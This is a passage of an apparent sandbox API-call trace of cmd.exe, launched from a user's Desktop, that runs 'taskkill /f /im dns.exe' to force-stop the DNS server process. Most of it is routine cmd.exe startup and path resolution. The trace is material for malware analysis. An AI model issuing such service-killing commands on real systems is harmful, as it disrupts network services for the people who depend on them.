0x2 [0055.170] RegCloseKey (hKey=0xcc) returned 0x0 [0055.171] time (in: timer=0x0 | out: timer=0x0) returned 0x5d302275 [0055.171] srand (_Seed=0x5d302275) [0055.171] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill.exe taskkill /f /im dns.exe" [0055.171] malloc (_Size=0x4000) returned 0x30f21f0 [0055.171] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill.exe taskkill /f /im dns.exe" [0055.171] malloc (_Size=0xffce) returned 0x2f50048 [0055.172] ??_V@YAXPAX@Z () returned 0xaffcf0 [0055.172] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x2f50048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0055.172] malloc (_Size=0xffce) returned 0x2f60020 [0055.173] ??_V@YAXPAX@Z () returned 0xaffac4 [0055.173] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f60020, nSize=0x7fe7 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0055.173] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0055.173] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0055.173] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0055.173] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0055.173] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0055.173] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0055.173] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0055.173] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0055.173] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0055.173] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0055.174] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0055.174] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0055.174] GetProcessHeap () returned 0xb00000 [0055.174] RtlFreeHeap (HeapHandle=0xb00000, Flags=0x0, BaseAddress=0xb05698) returned 1 [0055.174] GetEnvironmentStringsW () returned 0xb04bc0* [0055.174] GetProcessHeap () returned 0xb00000 [0055.174] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0xae2) returned 0xb07738 [0055.174] FreeEnvironmentStringsA (penv="A") returned 1 [0055.174] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0055.174] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0055.174] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0055.174] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0055.174] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0055.174] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0055.174] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0055.174] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0055.174] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0055.174] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0055.174] malloc (_Size=0xffce) returned 0x2f6fff8 [0055.175] ??_V@YAXPAX@Z () returned 0xaff85c [0055.175] GetProcessHeap () returned 0xb00000 [0055.175] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x38) returned 0xb00ae0 [0055.175] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x2f6fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0055.175] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x2f6fff8, lpFilePart=0xaff8a8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xaff8a8*="Desktop") returned 0x17 [0055.176] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0055.176] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xaff628 | out: lpFindFileData=0xaff628*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xb00b20 [0055.176] FindClose (in: hFindFile=0xb00b20 | out: hFindFile=0xb00b20) returned 1 [0055.176] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xaff628 | out: lpFindFileData=0xaff628*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0xb00b20 [0055.176] FindClose (in: hFindFile=0xb00b20 | out: hFindFile=0xb00b20) returned 1 [0055.176] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xaff628 | out: lpFindFileData=0xaff628*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xff77889f, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0xff77889f, ftLastWriteTime.dwHighDateTime=0x1d53d3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0xb00b20 [0055.176] FindClose (in: hFindFile=0xb00b20 | out: hFindFile=0xb00b20) returned 1 [0055.176] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0055.177] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0055.177] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0055.177] GetProcessHeap () returned 0xb00000 [0055.177] RtlFreeHeap (HeapHandle=0xb00000, Flags=0x0, BaseAddress=0xb07738) returned 1 [0055.177] GetEnvironmentStringsW () returned 0xb04bc0* [0055.177] GetProcessHeap () returned 0xb00000 [0055.177] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0xb1a) returned 0xb06c48 [0055.177] FreeEnvironmentStringsA (penv="=") returned 1 [0055.177] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x2f50048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0055.177] GetProcessHeap () returned 0xb00000 [0055.177] RtlFreeHeap (HeapHandle=0xb00000, Flags=0x0, BaseAddress=0xb00ae0) returned 1 [0055.177] ??_V@YAXPAX@Z () returned 0x1 [0055.177] ??_V@YAXPAX@Z () returned 0x1 [0055.177] GetProcessHeap () returned 0xb00000 [0055.177] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x400e) returned 0xb08d50 [0055.177] GetProcessHeap () returned 0xb00000 [0055.177] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x56) returned 0xb07770 [0055.177] GetProcessHeap () returned 0xb00000 [0055.177] RtlFreeHeap (HeapHandle=0xb00000, Flags=0x0, BaseAddress=0xb08d50) returned 1 [0055.178] GetConsoleOutputCP () returned 0x1b5 [0055.278] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0055.278] GetUserDefaultLCID () returned 0x409 [0055.278] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xe1f82c, cchData=8 | out: lpLCData=":") returned 2 [0055.278] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xaffc18, cchData=128 | out: lpLCData="0") returned 2 [0055.278] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xaffc18, cchData=128 | out: lpLCData="0") returned 2 [0055.279] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xaffc18, cchData=128 | out: lpLCData="1") returned 2 [0055.279] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xe1f81c, cchData=8 | out: lpLCData="/") returned 2 [0055.279] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xe1f7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0055.279] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xe1f778, cchData=32 | out: lpLCData="Tue") returned 4 [0055.279] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xe1f738, cchData=32 | out: lpLCData="Wed") returned 4 [0055.279] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xe1f6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0055.279] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xe1f6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0055.279] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xe1f678, cchData=32 | out: lpLCData="Sat") returned 4 [0055.279] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xe1f638, cchData=32 | out: lpLCData="Sun") returned 4 [0055.279] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xe1f80c, cchData=8 | out: lpLCData=".") returned 2 [0055.279] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xe1f7f8, cchData=8 | out: lpLCData=",") returned 2 [0055.279] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0055.280] GetProcessHeap () returned 0xb00000 [0055.280] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x20c) returned 0xb07818 [0055.280] GetConsoleTitleW (in: lpConsoleTitle=0xb07818, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0055.292] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0055.292] GetProcAddress (hModule=0x75e90000, lpProcName="CopyFileExW") returned 0x75ea4330 [0055.292] GetProcAddress (hModule=0x75e90000, lpProcName="IsDebuggerPresent") returned 0x75ea5930 [0055.292] GetProcAddress (hModule=0x75e90000, lpProcName="SetConsoleInputExeNameW") returned 0x74fe09d0 [0055.292] ??_V@YAXPAX@Z () returned 0x1 [0055.292] GetProcessHeap () returned 0xb00000 [0055.292] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x400a) returned 0xb08d50 [0055.292] GetProcessHeap () returned 0xb00000 [0055.292] RtlFreeHeap (HeapHandle=0xb00000, Flags=0x0, BaseAddress=0xb08d50) returned 1 [0055.293] _wcsicmp (_String1="taskkill.exe", _String2=")") returned 75 [0055.293] _wcsicmp (_String1="FOR", _String2="taskkill.exe") returned -14 [0055.293] _wcsicmp (_String1="FOR/?", _String2="taskkill.exe") returned -14 [0055.294] _wcsicmp (_String1="IF", _String2="taskkill.exe") returned -11 [0055.294] _wcsicmp (_String1="IF/?", _String2="taskkill.exe") returned -11 [0055.294] _wcsicmp (_String1="REM", _String2="taskkill.exe") returned -2 [0055.294] _wcsicmp (_String1="REM/?", _String2="taskkill.exe") returned -2 [0055.294] GetProcessHeap () returned 0xb00000 [0055.294] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x58) returned 0xb07a30 [0055.294] GetProcessHeap () returned 0xb00000 [0055.294] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x22) returned 0xb07a90 [0055.294] GetProcessHeap () returned 0xb00000 [0055.294] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x3a) returned 0xb07ac0 [0055.295] GetConsoleTitleW (in: lpConsoleTitle=0xaffb10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0055.295] malloc (_Size=0xffce) returned 0x2f62638 [0055.296] ??_V@YAXPAX@Z () returned 0xaff89c [0055.296] malloc (_Size=0xffce) returned 0x2f72610 [0055.296] ??_V@YAXPAX@Z () returned 0xaff654 [0055.297] GetFileAttributesW (lpFileName="taskkill.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\taskkill.exe")) returned 0xffffffff [0055.297] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0055.297] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0055.297] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0055.297] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0055.297] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0055.297] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0055.297] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0055.297] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0055.297] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0055.298] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0055.298] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0055.298] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0055.298] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0055.298] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0055.298] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0055.298] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0055.298] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0055.298] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0055.298] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0055.298] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0055.298] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0055.298] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0055.298] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0055.298] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0055.298] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0055.298] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0055.298] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0055.298] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0055.298] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0055.298] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0055.298] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0055.298] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0055.298] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0055.298] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0055.298] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0055.298] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0055.298] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0055.298] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0055.298] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0055.298] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0055.298] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0055.298] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0055.298] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0055.299] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0055.299] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0055.299] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0055.299] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0055.299] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0055.299] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0055.299] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0055.299] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0055.299] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0055.299] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0055.299] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0055.299] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0055.299] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0055.299] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0055.299] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0055.299] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0055.299] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0055.299] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0055.299] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0055.299] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0055.299] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0055.299] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0055.299] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0055.299] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0055.299] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0055.299] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0055.299] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0055.299] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0055.299] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0055.299] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0055.299] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0055.299] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0055.299] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0055.300] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0055.300] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0055.300] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0055.300] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0055.300] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0055.300] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0055.300] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0055.300] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0055.300] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0055.300] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0055.300] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0055.300] ??_V@YAXPAX@Z () returned 0x1 [0055.300] GetProcessHeap () returned 0xb00000 [0055.300] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0xffd6) returned 0xb08d50 [0055.301] GetProcessHeap () returned 0xb00000 [0055.301] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x54) returned 0xb07b08 [0055.301] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0055.301] malloc (_Size=0xffce) returned 0x2f72610 [0055.301] ??_V@YAXPAX@Z () returned 0xaff3d4 [0055.302] GetProcessHeap () returned 0xb00000 [0055.302] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x1ffa4) returned 0xb18d30 [0055.303] SetErrorMode (uMode=0x0) returned 0x0 [0055.303] SetErrorMode (uMode=0x1) returned 0x0 [0055.304] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0xb18d38, lpFilePart=0xaff3f4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xaff3f4*="Desktop") returned 0x17 [0055.304] SetErrorMode (uMode=0x0) returned 0x1 [0055.304] GetProcessHeap () returned 0xb00000 [0055.304] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb18d30, Size=0x52) returned 0xb18d30 [0055.304] GetProcessHeap () returned 0xb00000 [0055.304] RtlSizeHeap (HeapHandle=0xb00000, Flags=0x0, MemoryPointer=0xb18d30) returned 0x52 [0055.304] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0055.304] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0055.304] GetProcessHeap () returned 0xb00000 [0055.304] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x1b4) returned 0xb07b68 [0055.304] GetProcessHeap () returned 0xb00000 [0055.304] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x360) returned 0xb07d28 [0055.312] GetProcessHeap () returned 0xb00000 [0055.312] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb07d28, Size=0x1b6) returned 0xb07d28 [0055.312] GetProcessHeap () returned 0xb00000 [0055.312] RtlSizeHeap (HeapHandle=0xb00000, Flags=0x0, MemoryPointer=0xb07d28) returned 0x1b6 [0055.312] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0055.312] GetProcessHeap () returned 0xb00000 [0055.312] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0xe0) returned 0xb07ee8 [0055.313] GetProcessHeap () returned 0xb00000 [0055.313] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb07ee8, Size=0x76) returned 0xb07ee8 [0055.313] GetProcessHeap () returned 0xb00000 [0055.313] RtlSizeHeap (HeapHandle=0xb00000, Flags=0x0, MemoryPointer=0xb07ee8) returned 0x76 [0055.314] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0055.314] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\taskkill.exe", fInfoLevelId=0x1, lpFindFileData=0xaff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xaff1a0) returned 0xffffffff [0055.314] GetLastError () returned 0x2 [0055.314] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\taskkill.exe.*", fInfoLevelId=0x1, lpFindFileData=0xaff180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xaff180) returned 0xffffffff [0055.314] GetLastError () returned 0x2 [0055.314] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0055.314] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\taskkill.exe", fInfoLevelId=0x1, lpFindFileData=0xaff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xaff1a0) returned 0xffffffff [0055.314] GetLastError () returned 0x2 [0055.315] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\taskkill.exe.*", fInfoLevelId=0x1, lpFindFileData=0xaff180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xaff180) returned 0xffffffff [0055.315] GetLastError () returned 0x2 [0055.315] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0055.315] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\taskkill.exe", fInfoLevelId=0x1, lpFindFileData=0xaff1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xaff1a0) returned 0xb07f68 [0055.315] GetProcessHeap () returned 0xb00000 [0055.315] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x14) returned 0xb07fa8 [0055.315] FindClose (in: hFindFile=0xb07f68 | out: hFindFile=0xb07f68) returned 1 [0055.315] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0055.315] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0055.315] ??_V@YAXPAX@Z () returned 0x1 [0055.315] GetConsoleTitleW (in: lpConsoleTitle=0xaff684, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0055.316] InitializeProcThreadAttributeList (in: lpAttributeList=0xaff5b0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xaff59c | out: lpAttributeList=0xaff5b0, lpSize=0xaff59c) returned 1 [0055.316] UpdateProcThreadAttribute (in: lpAttributeList=0xaff5b0, dwFlags=0x0, Attribute=0x60001, lpValue=0xaff598, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xaff5b0, lpPreviousValue=0x0) returned 1 [0055.316] GetStartupInfoW (in: lpStartupInfo=0xaff5e8 | out: lpStartupInfo=0xaff5e8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0055.316] GetProcessHeap () returned 0xb00000 [0055.316] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x18) returned 0xb07f68 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0055.316] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0055.316] _wcsnicmp (_String1="COPYCMD", 